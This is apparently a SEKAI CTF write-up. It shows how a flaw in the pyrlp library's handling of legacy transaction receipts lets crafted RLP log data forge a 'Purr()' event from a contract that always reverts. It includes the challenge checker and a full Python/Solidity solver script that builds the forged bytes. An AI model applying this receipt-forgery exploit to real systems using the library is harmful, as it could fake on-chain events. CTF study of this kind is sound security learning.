Writeup

During SEKAI CTF, I encountered a very small blockchain challenge. I thought it would be a quick in-and-out experience, but it turned out to be a whole journey.

The source was small enough to give you false hope. We were given a contract that did nothing.

// SPDX-License-Identifier: MIT
// Fixed version to avoid foundry/4668
pragma solidity 0.8.27;

contract Cat {
    event Purr();
    function gibheadpats() public {
        revert("*sniff sniff HISS HISS* hooman detected....");
        emit Purr();
    }
}

And we had to somehow produce logs in a block that basically said the contract above called emit Purr()

#!/usr/bin/env python3
from Crypto.Hash import keccak
from pyrlp import decode  # https://github.com/SamuelHaidu/simple-rlp
from web3 import Web3
from ctf_launchers import PwnChallengeLauncher, current_challenge
from ctf_launchers.types import ChallengeContract
from ctf_server.types import LaunchAnvilInstanceArgs

k = keccak.new(digest_bits=256)
k.update(b'Purr()')
TARGET = k.digest()

class Launcher(PwnChallengeLauncher):
    def get_anvil_instances(self) -> dict[str, LaunchAnvilInstanceArgs]:
        # This challenge uses a "custom" foundry build:
        #   https://github.com/es3n1n/foundry/commit/21da3334659c2e54ea0680192daa0883935a473d
        return {
            'main': self.get_anvil_instance(
                image='ghcr.io/es3n1n/foundry:latest',
                extra_allowed_methods=['debug_getRawReceipts'],
            ),
        }
    def is_solved(
        self,
        web3: Web3,
        contracts: list[ChallengeContract],
        dynamic_fields: dict[str, str],
        team: str,
    ) -> bool:
        block_num = dynamic_fields.get('block', 'latest')
        if not block_num.startswith('0x'):
            block_num = f'0x{block_num}'
        receipts = web3.provider.make_request(
            'debug_getRawReceipts',  # type: ignore[arg-type]
            [block_num],
        )
        if 'error' in receipts:
            return False
        recs = receipts['result']
        if not recs:
            return False
        try:
            rec = bytes.fromhex(recs[0].replace('0x', ''))
            _tx_type, rlp = rec[:1], rec[1:]
            receipt = decode(rlp)
            if receipt[0] != b'\x01':
                return False
            if len(receipt[2]) != 256:
                return False
            logs = [x for x in receipt[3] if int.from_bytes(x[0], 'big') == int(contracts[0]['address'], 16)]
            if not logs:
                return False
            log = logs[0]
            if log[2] != b'':
                return False
            if log[1] != [TARGET]:
                return False
        except Exception:
            return False
        return True
current_challenge.bind(Launcher(project_location='/challenge/project', dynamic_fields=['block']))
if __name__ == '__main__':
    current_challenge.run()

In addition to this, we are told in the Python server source that a custom foundry (basically the blockchain’s source) is in use. After a quick look, we can see that it just adds an option to easily retrieve the logs, and that nothing can be exploited through this feature.

So what can we do?

After searching for much more than I want to admit on how to make the contract above emit that log, I came to the conclusion that it is impossible.

With this in mind, I checked the libraries, and the pyrlp one looked pretty old at first glance (last commit 2 years ago), so I dug deeper.

What it does is essentially parse blockchain logs into actual objects, such as arrays and strings. Considering what it does, a thought comes to mind.

What if I can inject logs that say the contract called purr without it doing so?

As of the writing of this post, there are six types of logs we can emit:

  • Legacy
  • EIP1559
  • EIP2930
  • EIP4844
  • EIP7702
  • Deposit

Checking each of the logs, we can see that all of them start with a random byte, 0xf9, and then comes some other data. That is all of them except Legacy, which doesn’t contain that random byte at the beginning, starting directly with 0xf9.

A quick check of the GitHub source reveals that the log reader doesn’t account for this case, which means we may be able to manipulate the data.

Right after the 0xf9 byte comes the length of the log, which we can manipulate. This means that by careful injection, we can satisfy these conditions

if receipt[0] != b'\x01':
    return False
if len(receipt[2]) != 256:
    return False
logs = [x for x in receipt[3] if int.from_bytes(x[0], 'big') == int(contracts[0]['address'], 16)]
if not logs:
    return False
log = logs[0]
if log[2] != b'':
    return False
if log[1] != [TARGET]:
    return False

We can use those controlled-length bytes to forge a fake long string that skips all the data that we don’t control and jumps into our controlled data. From there, it was easy enough to forge the required logs.

Here is the full solver for the challenge for anyone interested. Left some comments where the forgery takes place for better understanding.

#!/usr/bin/env python3
from env import RPC, PRIV, CAT
from web3 import Web3
from eth_account import Account
from Crypto.Hash import keccak
from eth_account.signers.local import LocalAccount
from hexbytes import HexBytes
from solcx import compile_standard, install_solc

SRC = r"""// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

contract Purrer {
    event Purr();
    bytes32 constant TOPIC = keccak256("Purr()");

    function emitPurr() external { emit Purr(); }

    function emitPurrWithBytes(bytes calldata payload) external {
        bytes32 t = TOPIC;
        // Copy calldata -> memory, then log from memory (logs read memory only)
        assembly {
            let len := payload.length
            let ptr := mload(0x40)
            let newfree := and(add(add(ptr, len), 31), not(31))
            mstore(0x40, newfree)
            calldatacopy(ptr, payload.offset, len)
            log1(ptr, len, t)
        }
    }
}
"""

def ensure_solc(v="0.8.24"):
    try: install_solc(v)
    except Exception: pass

def compile_src():
    ensure_solc()
    out = compile_standard(
        {
            "language": "Solidity",
            "sources": {"Purrer.sol": {"content": SRC}},
            "settings": {
                "optimizer": {"enabled": True, "runs": 200},
                "outputSelection": {"*": {"*": ["abi","evm.bytecode.object"]}},
            },
        },
        solc_version="0.8.24",
    )
    c = out["contracts"]["Purrer.sol"]["Purrer"]
    return c["abi"], c["evm"]["bytecode"]["object"]

def raw_tx_bytes(signed) -> bytes:
    return getattr(signed, "rawTransaction", None) or getattr(signed, "raw_transaction", None)

def send_and_wait_legacy(w3: Web3, acct: LocalAccount, tx, *, nonce=None):
    tx = dict(tx)
    if nonce is None:
        nonce = w3.eth.get_transaction_count(acct.address)
    tx.setdefault("nonce", nonce)
    tx.setdefault("gasPrice", w3.to_wei(2, "gwei"))  # legacy fee field
    tx.setdefault("chainId", w3.eth.chain_id)
    signed = acct.sign_transaction(tx)
    raw = raw_tx_bytes(signed)
    if not raw:
        raise RuntimeError("Couldn't extract raw tx bytes from SignedTransaction")
    txh = w3.eth.send_raw_transaction(raw)
    rcpt = w3.eth.wait_for_transaction_receipt(txh)
    return txh.hex(), rcpt

def print_receipt_logs(rcpt):
    print(f"status={rcpt.status} block={rcpt.blockNumber} gasUsed={rcpt.gasUsed}")
    for i, lg in enumerate(rcpt.logs):
        addr = lg["address"]
        topics = [(t.hex() if isinstance(t, (bytes, bytearray, HexBytes)) else t) for t in lg["topics"]]
        data_hex = lg["data"] if isinstance(lg["data"], str) else lg["data"].hex()
        if data_hex.startswith("0x"):
            data_len = len(bytes.fromhex(data_hex[2:]))
        else:
            data_len = len(bytes.fromhex(data_hex))
        print(f"  log[{i}].address={addr}")
        print(f"  log[{i}].topics[0]={topics[0] if topics else None}")
        print(f"  log[{i}].data_len={data_len}")

def main():
    MODE = "bytes"

    w3 = Web3(Web3.HTTPProvider(RPC, request_kwargs={"timeout": 300}))
    if not w3.is_connected():
        raise SystemExit("Cannot connect to RPC")

    acct = Account.from_key(PRIV)
    print("Sender:", acct.address)
    print("Chain :", w3.eth.chain_id)

    abi, bytecode = compile_src()


    nonce0 = w3.eth.get_transaction_count(acct.address)
    txh0, rcpt0 = send_and_wait_legacy(
        w3, acct,
        {
            "from": acct.address,
            "data": "0x" + bytecode,
            "gas": 3_000_000,
            "value": 0,
        },
        nonce=nonce0,
    )
    purrer = rcpt0.contractAddress
    print("Deployed at:", purrer)
    print("tx:", txh0)

    contract = w3.eth.contract(address=purrer, abi=abi)


    if MODE == "bytes":
        addr_bytes = bytes.fromhex(str(CAT)[2:])
        k = keccak.new(digest_bits=256)
        k.update(b'Purr()')
        TARGET = k.digest()
        # Build your exact 100k bytes here.
        # Example: first 1024 are 0x00..0xFF repeated; rest 0x13.
        raw = b'\x00' * 665
        raw += b'\x00' * 286
        raw += b'\xb9\x01\x00'
        raw += b'\x00' * 256
        raw += b'\xf8'
        #raw += b'\x07'



        in_arr_payload = b''
        in_arr_payload += b'\xf8'
        #in_arr_payload += b'\x20'

        in_arr_payload21 = b''
        in_arr_payload21 += b'\xb8'
        in_arr_payload21 += bytes([len(addr_bytes)])
        in_arr_payload21 += addr_bytes

        in_arr_payload22 = b''
        in_arr_payload22 += b'\xf8'


        in_arr_payload32 = b''
        in_arr_payload32 += b'\xb8'
        in_arr_payload32 += bytes([len(TARGET)])
        in_arr_payload32 += TARGET



        in_arr_payload22 += bytes([len(in_arr_payload32)])
        in_arr_payload22 += in_arr_payload32

        in_arr_payload23 = b'\x80'


        #in_arr_payload21 += bytes([len(in_arr_payload22)])
        in_arr_payload22 += in_arr_payload23
        in_arr_payload21 += in_arr_payload22

        in_arr_payload += bytes([len(in_arr_payload21)])
        in_arr_payload += in_arr_payload21






        raw += bytes([len(in_arr_payload)])
        raw += in_arr_payload
        
        ELEM = b'\x86' + b'\x13'*6     # 7 bytes
        PER_CHUNK = 256
        CHUNK_PAYLOAD = ELEM * PER_CHUNK     # 256 * 7 = 1792 = 0x0700
        CHUNK = b'\xf9\x07\x00' + CHUNK_PAYLOAD  # list (len-of-len=2) len=0x0700

        NUM_CHUNKS = (16128 // PER_CHUNK) - 1      # 63
        top_payload = CHUNK * NUM_CHUNKS     # each chunk is an RLP *element* of the top list
        top_len = NUM_CHUNKS * (1792 + 3)    # payload length of top list = 63 * (1792+3) = 113085 = 0x01B9BD

        raw += b'\xfa\x01\xb9\xbd' + top_payload  # top list header (len-of-len=3), len=0x01B9BD
        raw += b'\x00\x00\x00'
        print(len(raw))

        print(raw)

        built = contract.functions.emitPurrWithBytes(raw).build_transaction({
            "from": acct.address,
            "value": 0,
            "nonce": nonce0 + 1,
            "chainId": w3.eth.chain_id,
        })


    # Force legacy: strip 1559 fields just in case
    built.pop("maxFeePerGas", None)
    built.pop("maxPriorityFeePerGas", None)

    # Gas: ~ 375 + 375 (1 topic) + 8*LEN + mem copy/expansion.
    try:
        g_est = w3.eth.estimate_gas({**built, "gasPrice": w3.to_wei(2, "gwei")})
        built["gas"] = int(g_est * 12 // 10)  # +20%
    except Exception:
        # Fallback upper bound if estimate balks
        data_len = 0
        if MODE == "bytes":
            data_len = len(built["data"])  # ABI size, but not equal to log size; be generous
            # we’ll just use a big constant
            pass
        elif MODE == "chunks":
            data_len = 100_000
        elif MODE == "prefix":
            data_len = LEN
        built["gas"] = 1_000_000 + 12 * max(data_len, 100_000)

    txh1, rcpt1 = send_and_wait_legacy(w3, acct, built, nonce=nonce0 + 1)
    print("tx:", txh1)
    print_receipt_logs(rcpt1)
    print("\nPurr() topic:", Web3.keccak(text="Purr()").hex())

if __name__ == "__main__":
    main()